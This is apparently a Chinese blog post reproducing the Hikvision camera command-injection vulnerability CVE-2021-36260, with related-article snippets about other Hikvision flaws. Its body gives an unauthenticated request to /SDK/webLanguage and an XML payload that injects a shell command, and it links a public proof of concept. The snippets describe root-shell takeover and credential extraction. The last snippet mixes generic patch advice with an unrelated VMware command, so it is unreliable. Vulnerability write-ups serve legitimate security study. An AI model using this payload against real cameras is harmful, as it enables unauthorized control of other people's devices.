海康威视摄像头命令注入 CVE-2021-36260

冬6325

已于 2023-05-23 18:31:20 修改

阅读量2.3k

点赞数 2

分类专栏：漏洞复现文章标签：安全

于 2023-05-23 18:22:10 首次发布

本文链接：https://blog.youkuaiyun.com/qq_14902381/article/details/130832841

版权

漏洞复现专栏收录该内容

4 篇文章

订阅专栏

记录工作中发现的问题

此漏洞无需账号密码就可以利用

先访问ip:port//SDK/webLanguage ，用burpsuite抓包

修改url 为 /x，

#payload：
<?xml version='1.0'encoding='UTF-8'?>
  <language>
     $(ifconfig -a > webLib/x.asp)
  </language>

也可以用poc：CVE-2021-36260/CVE-2021-36260.py at main · Aiminsun/CVE-2021-36260 · GitHub

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

冬6325

关注关注

2
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【漏洞复现】Hikvision摄像头产品代码执行漏洞(CVE-2021-36260)

晚风不及你

01-20

6161

Hikvision（海康威视）是一家在中国颇具影响力的安防公司，其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富，涵盖了各种型号和功能，以满足不同用户的需求。

海康威视对讲广播系统 RCE漏洞复现(CVE-2023-6895)

0xSec

12-20

1836

Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞，该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。

参与评论您还未登录，请先登录后发表或查看评论

海康摄像头CVE-2021-36260漏洞复现

A_991128a的博客

04-25

2788

攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备，即使设备的所有者受限于有限的受保护 shell（psh）。除了入侵 IP摄像头外，还可以访问和攻击内部网络。该漏洞的利用并不需要用户交互，攻击者只需要访问 http 或 HTTPS服务器端口（80/443）即可利用该漏洞，无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。

海康威视hikOS系统常用命令

在阿尔法狗用361维向量重构围棋宇宙时，人们惊觉这团硅基智慧正以人类难以企及的速度逼近某种终极规律。

03-15

971

以下是针对海康威视HikOS（HikvisionOS Linux）系统的常用命令大全及配置说明，结合其基于Linux的特性及专用场景整理而成：

海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)

菜鸟学渗透

10-08

3354

海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)

HIKVISION海康威视代码执行漏洞复现(CVE-2021-36260)

红队是青春

01-27

7430

CVE-2021-36260，海康威视代码执行漏洞复现

海康威视对讲广播系统RCE漏洞(CVE-2023-6895)

weixin_43567873的博客

03-09

397

海康威视对讲广播系统RCE漏洞(CVE-2023-6895)

【漏洞复现】Hikvision SPON IP网络对讲广播系统命令执行漏洞(CVE-2023-6895)

李火火的安全圈

01-19

1478

Hikvision Intercom Broadcasting System是中国海康威视（Hikvision）公司的一个对讲广播系统。Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞，该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。

CVE-2017-7921海康威视配置文件解码(configfile解码)

12-11

该程序可以提取由于授权问题影响的多款Hikvision产品的configfile文件中的管理员账号密码。具体影响产品型号，请参考CVE-2017-7921；CVE-2017-7922漏洞详情。该程序发布，意在警醒相关单位及时更新相关设备，网络安全需要大家共同监督。(ps:工具不会使用可以私信我，直接差评的一律自理)

关于 海康威视 摄像头的整理-附件资源

03-05

关于 海康威视 摄像头的整理-附件资源

04 渗透测试基础

热门推荐

weixin_43234021的博客

01-04

1万+

渗透测试基础一代码审计1 基础环境搭建(1) Web服务：WAMP+phpstudy(2) phpstudy2 HTML 表单一代码审计 1 基础环境搭建 (1) Web服务：WAMP+phpstudy (2) phpstudy 启动问题端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件：[

推荐文章：海康威视CVE-2021-36260 RCE漏洞利用工具

gitblog_00088的博客

06-20

1548

打点--海康威视命令执行 CVE-2021-36260

weixin_51559599的博客

10-30

526

链接: https://pan.baidu.com/s/1KoV2cifZHnmwSaXfmSnPXw?pwd=u364 提取码: u364。

海康linux 命令,海康摄像机命令行

weixin_35397235的博客

04-30

3380

BusyBox v1.2.1 Protect Shell (psh) ver: MT-1494accessDvrSwitchatclearExcepcloseIRISdbgGuidebugCmddebugDspdebugLogdecStatdialPowerCtrldisableHBdisableWatchdogdmesgdspStatusenable3GOSDenableHBenableWatc...

探索安全边界：Hikvision摄像机远程命令注入漏洞利用工具深度解析

gitblog_00070的博客

05-29

885

探索安全边界：Hikvision摄像机远程命令注入漏洞利用工具深度解析去发现同类优质开源项目:https://gitcode.com/ 项目简介随着网络摄像头在监控领域的广泛应用，其安全性成为不可忽视的重要环节。CVE-2021-36260是一个针对特定型号Hikvision网络摄像机的命令注入漏洞示例。本开源项目由bashis贡献，提供了PoC代码，演示了如何通过未充分验证的输入，在指定版本...

CVE-2023-6895海康

最新发布

03-24

### 关于 CVE-2023-6895 的海康威视漏洞修复方案目前关于 CVE-2023-6895 的具体细节尚未公开披露，因此无法提供详细的漏洞描述或完整的修复方案。然而，在处理类似的海康威视设备漏洞时，通常可以参考以下通用方法来应对潜在的安全风险。 #### 1. 升级固件版本确保所使用的海康威视设备运行的是最新发布的固件版本。厂商通常会在新版本中修补已知的安全漏洞[^2]。可以通过访问官方支持页面获取最新的固件更新文件并按照说明完成升级操作。 #### 2. 手动配置防护措施如果暂时无法立即更新到最新版固件，则可采取一些临时性的防御手段减少攻击面： - **更改默认密码**: 避免使用出厂设置中的弱口令组合。 - **启用网络隔离机制**: 将敏感监控系统部署在独立网段内, 并通过防火墙策略限制外部访问权限。 - **禁用不必要的服务功能**: 对不需使用的远程管理接口予以关闭以降低被利用的可能性。 #### 3. 使用第三方工具验证安全性为了进一步确认当前环境是否存在该类别的安全隐患，建议借助专业的渗透测试软件进行扫描分析。例如 Metasploit Framework 中可能已经包含了针对此编号漏洞的概念证明 (Proof Of Concept) 脚本可供研究人员学习研究如何防范此类威胁。 #### 4. 应用补丁程序当制造商正式发布专门用于解决这个问题的热修复包之后，请务必遵循其文档指南正确安装应用这些修正内容。一般情况下会涉及如下步骤: ```bash esxcli software vib install -d "/path/to/patchfile.zip" ``` 上述命令展示了 VMware ESXi 平台上执行 patch deployment 的基本语法结构作为例子展示给用户了解整个流程概念[^3]。尽管以上信息并非特指 CVE-2023-6895 这一特定案例的具体情况，但它提供了面对同类事件时应该考虑的一些常规做法方向指导意义重大。 ```python # 示例 Python 脚本片段演示自动化检测过程的一部分逻辑实现思路 import requests def check_vulnerability(target_ip): url = f"http://{target_ip}/cgi-bin/check.cgi" headers = {"User-Agent": "VulnScanner"} try: response = requests.get(url, timeout=5, headers=headers) if 'vulnerable' in response.text.lower(): print(f"[!] Device at {target_ip} is VULNERABLE!") else: print(f"[*] Device at {target_ip} seems safe.") except Exception as e: print(f"[-] Error occurred while checking {target_ip}: ", str(e)) if __name__ == "__main__": target_list = ["192.168.1.1", "192.168.1.2"] for ip in target_list: check_vulnerability(ip) ```